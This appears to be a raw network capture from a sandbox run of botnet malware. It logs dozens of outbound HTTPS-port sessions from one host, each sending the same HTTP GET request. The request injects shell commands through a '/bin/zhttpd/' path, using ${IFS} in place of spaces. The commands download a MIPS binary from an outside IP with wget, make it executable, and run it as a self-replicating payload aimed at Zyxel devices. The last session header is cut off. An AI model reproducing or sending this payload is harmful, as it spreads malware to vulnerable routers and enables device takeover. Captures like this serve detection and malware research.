                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            303192.168.2.1349824206.222.231.107443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:09.452020884 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            304192.168.2.1335846198.79.110.92443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:09.452073097 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            305192.168.2.134202852.155.95.64443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:09.452083111 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            306192.168.2.1343866104.200.45.193443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:09.452130079 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            307192.168.2.133948074.107.229.172443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:09.452173948 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            308192.168.2.134649682.192.255.146443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:09.452197075 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            309192.168.2.133311081.253.162.133443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:09.452209949 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            310192.168.2.1346374154.141.15.79443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:09.452229977 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            311192.168.2.135929882.55.90.78443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:09.452636003 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            312192.168.2.134543472.75.56.200443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:09.452666998 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            313192.168.2.1333474132.58.128.64443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:09.452754974 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            314192.168.2.1333880129.247.168.170443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:09.452790976 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            315192.168.2.1355140168.95.40.238443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:09.452795982 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            316192.168.2.133824445.211.250.68443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:09.452836037 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            317192.168.2.134160073.210.234.61443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:10.456183910 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            318192.168.2.135294897.160.226.16443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:10.456221104 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            319192.168.2.1340614186.255.84.121443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:10.456248045 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            320192.168.2.1348518206.117.33.243443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:10.456279993 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            321192.168.2.1339626111.56.186.107443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:10.456330061 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            322192.168.2.13461348.75.156.54443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:10.456382036 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            323192.168.2.1347276126.97.86.11443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:10.456480026 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            324192.168.2.134796263.64.170.164443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:11.459403038 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            325192.168.2.1356780186.125.208.153443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:11.459448099 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            326192.168.2.1338260138.3.254.55443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:11.459465981 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            327192.168.2.133816246.213.172.109443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:11.459513903 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            328192.168.2.1343534109.85.79.235443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:11.459556103 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            329192.168.2.1352540162.252.246.0443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:11.459588051 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            330192.168.2.1341670210.151.9.178443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:11.459608078 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            331192.168.2.135344820.150.81.71443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:11.459642887 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            332192.168.2.1333760151.253.230.116443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:11.459675074 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            333192.168.2.1360990120.68.15.133443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:12.465146065 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            334192.168.2.1350456218.189.41.88443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:12.465241909 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            335192.168.2.1334104186.109.241.191443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:14.475127935 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            336192.168.2.1342286219.200.122.198443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:14.475202084 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            337192.168.2.136052876.243.108.95443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:14.475214958 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            338192.168.2.1351040200.87.54.135443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:14.475275993 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            339192.168.2.1358852149.164.123.39443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:14.475322962 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            340192.168.2.13402961.114.163.97443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:15.480478048 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            341192.168.2.1359604182.82.166.87443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:15.480495930 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            342192.168.2.133686445.150.114.180443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:15.480519056 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            343192.168.2.1356436188.180.233.111443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:15.480556011 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            344192.168.2.135845443.120.3.212443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:15.480588913 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            345192.168.2.1340916136.41.191.210443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:15.480623007 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            346192.168.2.1352414132.193.251.2443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:15.480665922 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            347192.168.2.1353200112.100.25.127443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:15.480716944 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            348192.168.2.1334602143.123.29.55443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:15.480756044 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            349192.168.2.1341282130.85.130.21443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:15.480813980 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            350192.168.2.133371696.186.191.130443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:15.480844975 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            351192.168.2.136087475.5.77.45443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:15.480885983 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            352192.168.2.13434028.105.60.233443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:15.480916023 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            353192.168.2.1349886101.193.34.30443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:15.480962038 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            354192.168.2.1342988109.214.59.125443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:15.480999947 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            355192.168.2.1341798161.184.162.5443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:15.481050014 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            356192.168.2.1337062160.173.227.18443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:15.481082916 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            357192.168.2.1336952141.23.112.123443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:15.481106997 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            358192.168.2.1333142172.192.109.134443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:15.481188059 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            359192.168.2.133649834.1.194.232443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:15.481210947 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            360192.168.2.136037895.165.246.147443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:15.481259108 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            361192.168.2.134774267.19.202.32443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:15.481316090 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            362192.168.2.134773088.65.195.120443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:15.481363058 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            363192.168.2.1357892164.222.108.153443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:15.481395960 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            364192.168.2.133780067.95.28.65443
                                                            TimestampBytes transferredDirectionData
